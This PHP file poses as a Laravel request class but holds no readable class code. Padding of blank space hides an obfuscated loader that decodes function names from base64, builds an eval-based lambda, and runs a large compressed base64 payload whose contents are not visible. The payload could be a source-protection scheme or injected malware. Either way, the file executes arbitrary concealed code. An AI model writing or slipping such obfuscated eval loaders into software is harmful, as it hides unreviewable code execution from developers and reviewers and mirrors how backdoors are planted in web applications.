<?php 
        $__='printf';$_='Loading app/Http/Requests/DuplikasiDataRequest.php';
        











































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































































                                                                                                                                                                                                                     $________;
